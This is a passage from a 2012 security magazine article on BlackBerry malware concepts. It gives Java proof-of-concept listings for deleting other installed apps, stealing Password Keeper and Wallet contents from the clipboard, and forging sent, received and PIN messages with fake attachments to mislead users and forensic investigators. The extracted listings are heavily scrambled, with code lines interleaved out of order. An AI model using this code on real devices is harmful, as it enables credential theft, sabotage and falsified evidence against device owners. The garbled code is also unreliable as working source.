public void conferenceCallDisconnected(int callId) {}
www.hakin9.org/en
69
16. Mobile Security
Figure 15. App list with Victim app
Figure 16. Details of Victim Apps
text field, while putting a string by one symbol and
track-wheel moving is too difficult although it may be
enough to input passwords (Figure 11-Figure 14, Listing 5).
Figure 17. App List with deleted victim app
70
Figure 18. Details of deleted victim app
Fourth malware concept is about destructive interaction. What is a common thesis when someone talks
about security? A security component must not be deleted because it brings down a security wall. Why doesn’t
malware delete all applications and modules installed
on your device? Some applications consist of several
modules and one removed crash down after the first
successful reboot. Another attack vector, BlackBerry
Enterprise Server offers application controlling by resending modules to selected devices regarding IT Policy. If a malware application turns off wireless to crash
the device then no one policy saves the device. When
you install an application you are asked to choose permissions that you grant to this application. As you know
from my articles about screenshot catching, the device
sometimes should ask what windows are allowed to interact with screenshot and which aren’t allowed. This
case is the same and all you need to delete other applications is a name and permission to interact with Application Manager. How do you extract data about applications? The easiest way to interrupt user flows is to grab
active applications at current time via ApplicationManager.
getApplicationManager().getVisibleApplications();. When
the application list has got malware grabs LocalizedName and ModuleHandle to find them in Application
Manager lists and deletes by using: ModuleHandle. That’s
all (Figure 15-Figure 18, Listing 6).
Fifth malware concept manages with Clipboard. From
previous zsndroid malware cases I retell in the beginning you learn password may extract from SMS or GET/
POST requests. My case refers to Password Keeper
and BlackBerry Wallet, which are both developed by
RIM; also, it is native and pre-installed by default. The
first application is designed to keep passwords more
than the second, which is designed to keep not only
passwords but also banking data. Extract essential information stored in BlackBerry backups. Elcomsoft
BlackBerry Backup Explorer allows forensic specialists
04/2012
17. Listing 6a. Code Example how find application among set of applications already running and how delete application
package blackBerryDeleterpackage;
import net.rim.device.api.system.ApplicationDescriptor;
import net.rim.device.api.system.ApplicationManager;
import net.rim.device.api.system.CodeModuleManager;
import net.rim.device.api.ui.Field;
import net.rim.device.api.ui.FieldChangeListener;
import net.rim.device.api.ui.component.ButtonField;
import net.rim.device.api.ui.container.MainScreen;
public final class BlackBerryDeleterScreen extends MainScreen implements FieldChangeListener
{
ButtonField bt_find = null;
ButtonField bt_delete = null;
TextField tf2 = null;
String stf2 = “”;
public BlackBerryDeleterScreen()
{
// Set the displayed title of the screen
setTitle(“BlackBerryDeleterTitle”);
bt_find = new ButtonField();
bt_delete = new ButtonField();
tf2 = new TextField();
bt_find.setLabel(“FIND APP”);
bt_delete.setLabel(“DEL APP”);
bt_find.setChangeListener(this);
bt_delete.setChangeListener(this);
tf2.setLabel(“INFOrn”);
add(tf2);
add(bt_find);
}
add(bt_delete);
public void fieldChanged(Field field, int context)
{
if (field == bt_find)
//BUTTON “FIND APPLICATION”
{
{
try
int curr_app = ApplicationDescriptor.currentApplicationDescriptor().getModuleHandle();
ApplicationDescriptor desc = null;
ApplicationDescriptor[] descs = null;
try
{
descs = ApplicationManager.getApplicationManager().
getVisibleApplications();
www.hakin9.org/en
71
20. Mobile Security
Listing 7. Clipboard exploitation (How extract data to steal
data, and how to put data to mislead someone)
import net.rim.device.api.ui.component.TextField;
import net.rim.device.api.ui.container.MainScreen;
import net.rim.device.api.system.Clipboard;
public final class BlackBerryClipboardScreen extends
MainScreen
{
public BlackBerryClipboardScreen()
{
setTitle(“BlackBerryClipboardTitle”);
Clipboard clipb = Clipboard.getClipboard();
Figure 19. BB Wallet. Creating & Stealing
TextField tf1 = new TextField();
investigating the content of BlackBerry devices by extracting, analyzing, printing or exporting the content of a
BlackBerry backup produced with BlackBerry Desktop
Software. But Elcomsoft manages to work with exported data that you back up. RIM made a “good” security
solution to restrict any access attempts to the clipboard
while their applications are active. If you try to grab data
you’ll get the error message “Unauthorized attempt to
attach to this application.” Don’t panic, because when a
user minimizes it or closes it, a successful data extraction happens. If you want to know whether BlackBerry
Wallet (or Password Keeper) is running now, use the
code example on how to find application (Figure 19-Figure 20, Listing 7).
Screenshotting has been discussed many times,
therefore I highlight that “this feature” can easily bypass security flows when the user restricts other permissions. For example, if user restricts a GEO permission you listen to active applications for catching
screen shot of a map that the user is seeing at current
time. When the map application starts it often shows
add(tf1);
TextField tf2 = new TextField();
add(tf2);
TextField tf3 = new TextField();
add(tf3);
tf1.setLabel(“to_string : < “ + clipb.
toString() + “ >”);
// SHOW CLIPBOARD AS STRING OBJECT
String str = “”;
try
{
}
str = (String)clipb.get();
// GET CLIPBOARD DATA
catch (Exception e)
{ }
try
{
}
clipb.put(“PUT”);
// CLIPBOARD SET BY WORD “PUT”
catch (Exception e) { }
tf2.setLabel(“getted : < “ + str + “ >”);
try
{
}
// SHOW THAT CLIPBOARD DATA HAS BEEN STOLEN
str = (String)clipb.get();
// GET NEW CLIPBOARD DATA
catch (Exception e)
{
}
tf3.setLabel(“getted : < “ + str + “ >”);
// SHOW THAT CLIPBOARD SET BY WORD “PUT”
Figure 20. BB Wallet. Showing & Stealing
74
}
}
04/2012
22. Mobile Security
Listing 8b. MESSAGE MISLEADING
length() > 0)
//MESSAGE BODY
Address oaddress =
null;
from fextfield
try
{
alert(MisLeadSentPIN(tf.
MESSAGE BUILDER
getText()));
}
}
catch
(AddressException e)
{
length() > 0)
res +=
from textfield
MisLeadSentMessage(oaddress,
omessage, odelivered);
//EMAIL MESSAGE
}
MESSAGE BUIDLER
}
String res = “”;
{
//MESSAGE BODY
“^_^”;
try
{
= null;
iaddress
= new Address(“fake@ololo.com”,
“trololo friend”);
(AddressException e)
e.getMessage(); }
//
{ res +=
MESSAGE SENDER
}
76
String res = “”;
String imessage =
//MESSAGE BODY
Address iaddress
try
iaddress
//
}
(AddressException e)
e.getMessage(); }
{ res +=
res += MisLeadInbo
xMessageAttach(iaddress, imessage);
Dialog.
else if (field == checkpoButton)
{
}
catch
//EMAIL MESSAGE
alert(“Result for you :: “ + res);
Dialog.
//PIN
“trololo friend”);
res +=
BUILDER
{
= new Address(“fake@ololo.com”,
MisLeadInboxMessage(iaddress,
imessage);
//GET SENDER PIN
{
}
catch
if (tf.getText().
else if (field == checkiaButton)
String imessage =
Address iaddress =
SENDER ADDRESS
}
getText()));
else if (field == checkiButton)
null;
//PIN
alert(MisLeadInboxPIN(tf.
Dialog.alert(“Result for you :: “ + res);
“^_^”;
Dialog.
else if (field == checkpiButton)
{ res +=
e.getMessage(); }
{
{
//SET A
“trololo friend”);
BUILDER
//GET RECIPIENT PIN
oaddress
= new Address(“fake@ololo.com”,
NEW RECIPIENT
if (tf.getText().
BUIDLER
//EMAIL MESSAGE
Dialog.alert(“Result for you :: “ + res);
}
}
04/2012
23. Listing 8c. MESSAGE MISLEADING
message += e.getMessage();
msg.setSentDate(new Date(System.
static String MisLeadSentMessage(Address oaddress,
currentTimeMillis()));
String message, boolean delivered)
// ADD NEW TIME
//BUILDER OF SENT EMAIL MESSAGE
{
sentfolder.appendMessage(msg);
// ADD NEW EMAIL MESSAGE TO SENT FOLDER
String error_message = “”;
if (error_message.length() < 1) { error_
Store store = Session.
getDefaultInstance().getStore();
Folder[] folders = store.list(Folder.
SENT);
// RETRIVE A SENT FOLDER
Folder sentfolder = folders[0];
Message msg = new Message(sentfolder);
//CREATE a NEW MESSAGE IN SENT FOLDER
if (delivered) // CHECK DELIVERY STATUS
{
}
msg.setStatus(Message.Status.
TX_SENT, Message.Status.TX_SENT);
else
{
msg.setStatus(Message.Status.
msg.setFlag(Message.Flag.
OPENED, true);
// SET READ STATUS
}
Session session = null;
try
}
session = Session.
waitForDefaultSession();
catch (NoSuchServiceException e)
{ error_
message += e.getMessage(); }
INBOX);
//CREATE A NEW MESSAGE IN INBOX FOLDER
try
{
msg.setContent(message);
catch (NoSuchServiceException e)
{ error_
message += e.getMessage(); }
msg.setSentDate(new Date());
// ADD NEW DATE
catch (MessagingException e) { error_
message += e.getMessage();
Folder inbox = folders[0];
}
try
}
try
msg.setFrom(fromAddress);
//ADD A SENDER
msg.setStatus(Message.Status.RX_RECEIVED,
Message.Status.RX_RECEIVED);
//ADD A RECEIVED STATUS
msg.setSentDate(new Date(System.
currentTimeMillis()));
msg.setContent(message);
// ADD BODY
catch (MessagingException e) { error_
www.hakin9.org/en
String error_message = “”;
final Message msg = new Message(inbox);
// ADD SUBJECT TO EMAIL MESSAGES
}
ATTACHMENT
// ADD RECIPIENT
msg.setSubject(“subject”);
{
{
// RETRIVE AN INBOX FOLDER
message += e.getMessage();
}
fromAddress, String message)
//BUILDER OF RECEIVED EMAIL MESSAGE WITHOUT
msg.addRecipient(Message.
catch (MessagingException e) { error_
{
static String MisLeadInboxMessage(Address
Folder[] folders = store.list(Folder.
RecipientType.TO, oaddress);
}
}
Store store = session.getStore();
try
{
message = “no_error”; }
return error_message;
{
TX_ERROR, Message.Status.TX_ERROR);
}
}
//ADD DATE’n’TIME
msg.setFlag(Message.Flag.REPLY_ALLOWED,
true);
msg.setInbound(true);
msg.setSubject(“subject”);
77
24. Mobile Security
Listing 8d. MESSAGE MISLEADING
//ADD A SUBJECT TO EMAIL MESSAGE
inbox.appendMessage(msg);
//ADD EMAIL MESSAGE TO THE INBOX FOLDER
if (error_message.length() < 1)
{
error_message = “no_error”;
}
}
}
static String MisLeadInboxPIN(String FakePIN)
//BUILDER OF RECEIVED PIN MESSAGE
{
String err = ““;
String error_message = “”;
return error_message;
Store store = Session.
getDefaultInstance().getStore();
Folder[] folders = store.list(Folder.
static String MisLeadSentPIN(String FakePIN)
INBOX);
//BUILDER OF SENT PIN MESSAGE
{
return err;
//RETRIEVE a PIN INBOX
FOLDER
Folder inboxfolder = folders[0];
String err = “”;
Message msg = new Message(inboxfolder);
String error_message = “”;
//CREATE A PIN MESSAGE IN THE INBOX
Store store = Session.
FOLDER
getDefaultInstance().getStore();
PINAddress recipients[] = new
SENT);
try
Folder[] folders = store.list(Folder.
//RETRIEVE a PIN SENT FOLDER
PINAddress[1];
{
Folder sentfolder = folders[0];
recipients[0]= new
Message msg = new Message(sentfolder);
PINAddress(FakePIN, “Robert”);
//CREATE A PIN MESSAGE IN THE SENT FOLDER
PINAddress recipients[] = new
try
}
PINAddress[1];
{
catch (Exception e)
{
PINAddress(FakePIN, “Robert”);
NAME
try
RecipientType.TO, recipients);
//ADD RECIPIENTS TO PIN STRUCTURE
msg.setSubject(“SUBJ”);
//ADD A SUBJECT
e.getMessage(); }
msg.setContent(“BODY”);
//ADD A BODY
msg.setStatus(Message.Status.
msg.addRecipients(Message.
RX_RECEIVED, Message.Status.RX_
RecipientType.TO, recipients);
RECEIVED);
//ADD RECIPIENTS TO PIN
//ADD A RECEIVED STATUS
STRUCTURE
inboxfolder.appendMessage(msg);
msg.setSubject(“SUBJ”);
//ADD A SUBJECT
}
msg.setContent(“BODY”);
//PUT MESSAGE INTO INBOX FOLDER
catch (Exception e)
//ADD A BODY
e.getMessage();
msg.setStatus(Message.Status.
TX_SENT, Message.Status.TX_SENT);
}
msg.addRecipients(Message.
//ADD RECIPIENT BY PIN and
catch (Exception e) { err +=
{
{ err +=
e.getMessage();
try
recipients[0]= new
}
//ADD RECIPIENT BY PIN and NAME
return err;
{ err +=
}
//ADD A SENT STATUS
}
//PUT MESSAGE INTO SENT FOLDER
static String MisLeadInboxMessageAttach(Address
sentfolder.appendMessage(msg);
}
catch (Exception e) { err +=
e.getMessage(); }
78
fromAddress, String message)
//BUILDER OF RECEIVED EMAIL MESSAGE WITH ATTACHMENT
{
04/2012
25. Listing 8e. MESSAGE MISLEADING
try
String error_message = “”;
{
Session session = null;
try
{
getMIMEType(fullname1);
//ADD ATTACHMENT
session = Session.
WITH CORRECT FILE TYPE
waitForDefaultSession();
}
catch (NoSuchServiceException e)
}
catch (Exception e) { error_
{ error_
message += e.getMessage(); }
Store store = session.getStore();
Folder[] folders = store.list(Folder.
INBOX);
// RETRIVE AN INBOX FOLDER
}
finally
try
msg.setContent(message);
}
catch (MessagingException e)
{ error_
message += e.getMessage(); }
msg.setFrom(fromAddress);
//ADD A SENDER
name-$$”, data);
multipart.addBodyPart(attach);
data = readFile(fullname2);
mtype = “”;
try
{
//ADD A RECEIVED STATUS
getMIMEType(fullname2);
currentTimeMillis()));
//ADD ATTACHMENT
//ADD DATE’n’TIME
WITH CORRECT FILE TYPE
msg.setFlag(Message.Flag.REPLY_ALLOWED,
}
true);
catch (Exception e)
msg.setInbound(true);
{
msg.setSubject(“subject”);
//ADD A SUBJECT TO EMAIL MESSAGE
e.getMessage();
String fullname1 = “file:///SDCard/bin/
}
String fullname2 = “file:///SDCard/bin/
{
//CALL YOUR OWN READ METHOD TO GET
ATTACHMENT DATA
Multipart multipart = new Multipart();
SupportedAttachmentPart attach = null;
String mtype = “”;
{
try
www.hakin9.org/en
error_message +=
}
finally
//SET PATH OF EXECUTION FILE
data = readFile(fullname1);
mtype
= MIMETypeAssociations.
msg.setSentDate(new Date(System.
byte[] data = new byte[256];
try
{
Message.Status.RX_RECEIVED);
BlackBerryKit_1.cod”;
//ADD A FAKE ATTACHMENT NAME
}
msg.setStatus(Message.Status.RX_RECEIVED,
BlackBerryKit_1.jad”;
attach = new SupportedAttach
mentPart(multipart, mtype, “file-
final Message msg = new Message(inbox);
//CREATE A NEW MESSAGE IN INBOX FOLDER
message += e.getMessage(); }
{
Folder inbox = folders[0];
{
mtype
= MIMETypeAssociations.
attach = new SupportedAttach
mentPart(multipart, mtype, “filename-$$$”, data);
}
//ADD A FAKE ATTACHMENT NAME
multipart.addBodyPart(attach);
try
{
}
msg.setContent(multipart);
catch (MessagingException e)
79
26. Mobile Security
Listing 8f. MESSAGE MISLEADING
{
}
data = IOUtilities.
}
error_message +=
streamToBytes(is);
catch (IOException e)
e.getMessage();
finally
//ADD A FAKE ATTACHMENT
{
inbox.appendMessage(msg);
try
//PUT AN EMAIL MESSAGE WITH ATTACHMENT TO INBOX FOLDER
{
if (error_message.length() < 1)
{
}
}
error_message = “no_error”;
is.close();
return error_message;
if (null != fconn)
close();
FileConnection fconn = null;
}
DataInputStream is = null;
}
is = fconn.
the previous location, so it is a kind of timeline (Figure
21 and Listing 8).
Conclusion
These two articles describe how anyone could easily
develop malware or a security application to manage
{
Dialog.alert(e.getMessage()); }
return data;
fconn = (FileConnection) Connector.
openDataInputStream();
fconn.
}
catch (IOException e)
try
open(FullName, Connector.READ);
}
{
byte[] data = null;
{
if (null != is)
{
public static byte[] readFile(String FullName)
{
{ Dialog.alert(e.
getMessage()); }
}
}
with other vulnerabilities. These highlighted points are
very actual because some of them take advantage of
old security issues and concepts from DOS, UNIX and
other OSs.
Yury Chemerkin
Figure 21. ScreenShot of BlackBerry Map
80
Graduated at Russian State University for the Humanities
(http://rggu.com/) in 2010. At present, postgraduate at RSUH.
Information Security Researcher since 2009 and currently
works as mobile and social information security researcher in
Moscow. Experienced in Reverse Engineering, Software Programming, Cyber & Mobile Security Researching, Documentation, and Security Writing as regular contributor. Now researching Cloud Security and Social Privacy.
Contacts: I have a lot of social contacts, that’s way you’re able
to choose the most suitable way for you.
Regular blog: http://security-through-obscurity.blogspot.com
Regular Email: yury.chemerkin@gmail.com
Skype: yury.chemerkin
Other my contacts (blogs, IM, social networks) you’ll find
among http links and social icons before TimeLine section on
Re.Vu: http://re.vu/yury.chemerkin
04/2012
27. The last exploitation
The last exploitation covers so-called message misleading discussed in one of my previous articles. I recall some ideas and
present code that attempts to cover all entry points and can
be easily adapted for testing. RIM API has ability to create PIN
mail service. What are the goals you gain by implementing
these ideas? Maybe you would like to build steganography,
maybe you have to make a lot of fake message with fake interaction graphs to perplex forensic investigating or maybe
something else – it is all up to you (Figure 22-Figure 25).
Figure 22. Sent Email Message
Figure 24. Pin-to-PIN Message with Error Status
Figure 23. Received Email Message with attach
Figure 25. Pin-to-PIN Message with Sent Status
and e-mail with any possible parameters like their type as incoming, outgoing, received, sent, draft, etc. and their status
(read, unread, error while sent, etc.). You may set your own
date, list of recipients, subjects, body, attachments. Note that
not one of these messages will synchronize with your real e-
On the Net
• http://forum.drweb.com/index.php?showtopic=302926 – New Trojan horse for Android spreads with Angry Birds Rio Unlock,
Dr.Web
• http://www.csc.ncsu.edu/faculty/jiang/DroidKungFu.html, http://www.csc.ncsu.edu/faculty/jiang/DroidKungFu2/ – Researching
for DroidKungFu variants, Xuxian Jiang, Assistant Professor, Department of Computer Science, NC State University
• http://blog.mylookout.com/blog/2011/01/07/geinimi-trojan-technical-analysis/ – Geinimi Trojan Technical Analysis,
• http://www.informationweek.com/news/security/mobile/231001685 – Zitmo Banking Trojan
• http://www.computerworld.com/s/article/9210764/New_bank_Trojan_employs_fresh_tricks_to_steal_account_data – OddJob
bank trojan
• http://www.elcomsoft.com/ebbe.html – Elcomsoft Blackberry Backup Explorer
www.hakin9.org/en
81